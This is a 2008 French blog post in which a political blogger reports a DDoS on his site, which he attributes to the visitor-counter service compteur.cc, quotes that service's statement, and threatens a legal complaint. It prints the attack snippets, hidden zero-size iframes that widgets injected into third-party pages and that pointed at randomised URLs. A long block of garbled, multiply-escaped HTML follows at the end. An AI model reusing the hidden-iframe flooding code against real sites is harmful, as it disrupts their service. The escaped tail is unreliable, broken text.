À Bâbord Toute! de nouveau attaqué par compteur.cc.

Publié le 16 mai 2008 par Julien29

A Bâbord Toute! a de nouveau fait l’objet d’une attaque de type DDOS de la part de compteur.cc qui a commencé le 12 mai aux alentours de 21H.
Mon blog faisant toujours l’objet, à l’heure où j’écris ces lignes, de visites frauduleuses, veuillez excuser les éventuelles lenteurs que vous pourriez observer lors du chargement des pages.
Pour le reste, il est désormais plus que temps de mettre les choses au clair.
Depuis hier, le site compteur.cc diffuse ce message sur sa page d’accueil:

“Parce que notre partenaire Bloguez.com essaye de protéger les enfants en interdisant le contenu adulte des blogs et parce que compteur.cc filtre les liens adultes sur ses pages pour la même raison quelques individus malsains, Pervers et jaloux essaient pas tous les moyens qui leurs sont possibles de nuire à notre image en utilisant des propos diffamatoires et des accusations imaginaires sur leurs blogs.
Nos services sont 100% gratuits et sans risque en échange d’une publicité discrète et saine, nos sponsors sont de grandes enseignes françaises et internationales de renommée avec qui nous avons conclut des partenariats.
Il faut savoir que plus de 2.5% des revenus sont reversés à des associations humanitaires et des personnes démunis.

Merci de votre confiance.
L’équipe de compteur.cc”

Outre les insultes à mon égard, on remarquera qu’ils essaient de se faire passer pour de bons samaritains. Un comble!
Mes articles (ici et ici) n’ont rien de diffamatoires ou injurieux. J’avais bien pris soin en les rédigeant qu’ils ne le soient pas afin de rester dans la légalité.
Dans la légalité, compteur.cc ne l’est pas resté en commettant ces attaques.
Voici donc un bout du code que renvoyaient les gadgets du site lors du chargement de la page d’un site en ayant installé:

?script language=”javascript”>
document.write(‘iframe src=”http://www.blog-politique-a-babord-toute.fr” width=”0″ height=”0″ frameborder=”0″>/iframe>’);
/?script>
iframe height=”0″ frameborder=”0″ width=”0″ src=”http://www.blog-politique-a-babord-toute.fr
“>
html>
head>
title>403 Forbidden/title>
/head>
body>
h1>Forbidden/h1>
You don’t have permission to access / on this server.
p> /p>
hr/>
address>Apache/1.3.41 Server at www.blog-politique-a-babord-toute.fr Port 80/address>
/body>
/html>
/iframe>
noscript>a href=”http://www.compteur.cc”>Compteur/a>/noscript>

En rouge on voit la fonction qui appelle le chargement de mon blog.
A ce moment là, j’avais commencé à sécuriser mon site. Comme on peut le voir dans le code, mon blog renvoyait alors la réponse “You don’t have permission to access / on this server”. Le pirate s’en étant rendu compte et pensant que j’avais uniquement protégé la page d’accueil de mon blog, il a alors essayé de pointer ses liens vers une page aléatoire. Le code est alors devenu:

?script language=”javascript”>
document.write(’iframe src=”http://www.blog-politique-a-babord-toute.fr/?s=’+Math.floor(Math.random()*100)+’” width=”0″ height=”0″ frameborder=”0″>/iframe>’);
/?script>

Comme on peut le voir dans le code, cela avait pour effet de charger mon blog sans l’afficher (width=”0″ height=”0″ frameborder=”0″).
Des codes tels que ceux-là j’en ai relevé tellement sur divers sites et blogs que je pourrais en faire un annuaire!
En règle général, un pirate attaquant par DDOS opère dans l’anonymat le plus total. Là, le pirate a non seulement signé son attaque mais en plus, a laissé de très nombreuses traces derrière lui ce qui rend une procédure judiciaire aisée.

En conséquence de quoi: en cas de nouvelle attaque de quelque nature qu’elle soit, menace ou pression en vue de faire retirer un contenu envers A Bâbord Toute!, tout site ami ou plate-forme de republication, une plainte sera transmise immédiatement au Procureur de la République du Tribunal de Grande Instance de Lille au titre de l’article 323-2 du code pénal pour « entrave au fonctionnement d’un système de traitement automatisé de données », qui vous rendra passible de cinq ans d’emprisonnement et de 75000 euros d’amende. En outre, une mise en demeure visant à faire cesser vos agissements sera envoyée à vos deux hébergeurs. Une procédure contre un pirate d’une attaque DDOS non identifié aurait peu de chances d’aboutir, mais contre un pirate identifié et qui laisse autant de traces que vous, ce ne sera qu’une simple formalité que je n’hésiterai pas à accomplir. A bon entendeur…

Je tiens pour finir à remercier toutes les personnes qui m’ont témoigné de leur soutien ou qui m’ont fourni une assistance technique lors de cette affaire.
Mon blog va maintenant se re-concentrer sur son sujet premier qui est la politique, sinon wikio va finir par me classer dans les blogs “nouvelles technologies” ou même “juridique”! :wink:

<><><><><>

<><><><>&<><>

&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;html&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;head&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/head&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;body&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;h1&amp;amp;amp;amp;gt;Forbidden&amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; You don&#8217;t have permission to access / on this server.&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;hr /&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;address&amp;amp;amp;amp;gt;Apache/1.3.41 Server at www.blog-politique-a-babord-toute.fr Port 80&amp;amp;amp;amp;lt;/address&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/body&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/html&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt;

&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;html&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;head&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;meta content=&#8221;no-cache&#8221; name=&#8221;Cache-Control&#8221;/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;meta content=&#8221;no-cache&#8221; name=&#8221;pragma&#8221;/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/head&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;body leftmargin=&#8221;0&#8243; topmargin=&#8221;0&#8243;&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;a title=&#8221;WebAnalytics&#8221; href=&#8221;http://www.xiti.com/xiti.asp?s=281802&#8243;&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;script type=&#8221;text/javascript&#8221;&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/script&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;img height=&#8221;25&#8243; border=&#8221;0&#8243; width=&#8221;39&#8243; title=&#8221;Internet Audience&#8221; src=&#8221;http://logv33.xiti.com/hit.xiti?s=281802&amp;amp;amp;amp;amp;p=clockswf&amp;amp;amp;amp;amp;hl=14&#215;9x7&amp;amp;amp;amp;amp;r=1024&#215;768x24&#215;24&amp;amp;amp;amp;amp;ref=http://irreversible.cowblog.fr/&#8221; /&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;noscript&amp;amp;amp;amp;gt;Mesure d&#8217;audience ROI statistique webanalytics par &amp;amp;amp;amp;lt;img width=&#8221;39&#8243; height=&#8221;25&#8243; src=&#8221;http://logv33.xiti.com/hit.xiti?s=281802&amp;amp;amp;amp;amp;p=&#8221; alt=&#8221;WebAnalytics&#8221; /&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/noscript&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/body&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;/html&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;gt; &amp;amp;amp;amp;lt;p&amp;amp;amp;amp;gt;